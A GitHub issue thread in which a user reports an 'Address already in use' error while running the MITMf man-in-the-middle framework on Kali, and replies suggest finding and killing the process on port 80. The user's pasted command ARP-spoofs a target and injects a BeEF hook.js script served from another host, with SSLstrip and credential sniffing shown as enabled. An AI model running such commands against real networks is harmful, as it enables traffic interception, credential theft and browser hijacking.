### ISSUE TITLE
Error starting HTTP server: [Errno 98] Address already in use

### ISSUE THREAD

**Issue by mofei-123** [byt3bl33d3r/MITMf#379]
help me, MITMF start  error

root@kali:~# mitmf --spoof --arp -i eth0 --gateway 192.168.139.1 --target 192.168.139.130 --inject --js-url http://192.168.139.167:3000/hook.js
                                                    
 __  __   ___   .--.          __  __   ___              
|  |/  `.'   `. |__|         |  |/  `.'   `.      _.._  
|   .-.  .-.   '.--.     .|  |   .-.  .-.   '   .' .._| 
|  |  |  |  |  ||  |   .' |_ |  |  |  |  |  |   | '     
|  |  |  |  |  ||  | .'     ||  |  |  |  |  | __| |__   
|  |  |  |  |  ||  |'--.  .-'|  |  |  |  |  ||__   __|  
|  |  |  |  |  ||  |   |  |  |  |  |  |  |  |   | |     
|__|  |__|  |__||__|   |  |  |__|  |__|  |__|   | |     
                       |  '.'                   | |     
                       |   /                    | |     
                       `'-'                     |_|

[*] MITMf v0.9.8 - 'The Dark Side'
|_ Inject v0.4
|_ Spoof v0.6
|  |_ ARP spoofing enabled
|
|_ Sergio-Proxy v0.2.1 online
|_ SSLstrip v0.9 by Moxie Marlinspike online
|
|_ Net-Creds v1.0 online
|_ MITMf-API online
Error starting HTTP server: [Errno 98] Address already in use
|_ HTTP server online
Exception in thread mitmfapi:
Traceback (most recent call last):
  File "/usr/lib/python2.7/threading.py", line 801, in __bootstrap_inner
    self.run()
  File "/usr/lib/python2.7/threading.py", line 754, in run
    self.__target(*self.__args, **self.__kwargs)
  File "/usr/share/mitmf/core/mitmfapi.py", line 90, in startFlask
    app.run(debug=False, host=self.host, port=self.port)
  File "/usr/lib/python2.7/dist-packages/flask/app.py", line 772, in run
    run_simple(host, port, self, **options)
  File "/usr/lib/python2.7/dist-packages/werkzeug/serving.py", line 694, in run_simple
    inner()
  File "/usr/lib/python2.7/dist-packages/werkzeug/serving.py", line 656, in inner
    fd=fd)
  File "/usr/lib/python2.7/dist-packages/werkzeug/serving.py", line 550, in make_server
    passthrough_errors, ssl_context, fd=fd)
  File "/usr/lib/python2.7/dist-packages/werkzeug/serving.py", line 464, in __init__
    HTTPServer.__init__(self, (host, int(port)), handler)
  File "/usr/lib/python2.7/SocketServer.py", line 417, in __init__
    self.server_bind()
  File "/usr/lib/python2.7/BaseHTTPServer.py", line 108, in server_bind
    SocketServer.TCPServer.server_bind(self)
  File "/usr/lib/python2.7/SocketServer.py", line 431, in server_bind
    self.socket.bind(self.server_address)
  File "/usr/lib/python2.7/socket.py", line 228, in meth
    return getattr(self._sock,name)(*args)
error: [Errno 98] Address already in use

**Comment by anirudhrata** [comment]
Obviously do a `netstat -pant` and find out which process is using that port. Kill it and run mitmf.

**Comment by adriaanjoubert** [comment]
Run ``sudo kill `sudo lsof -t -i:80` `` to kill the HTTP server running on port 80.
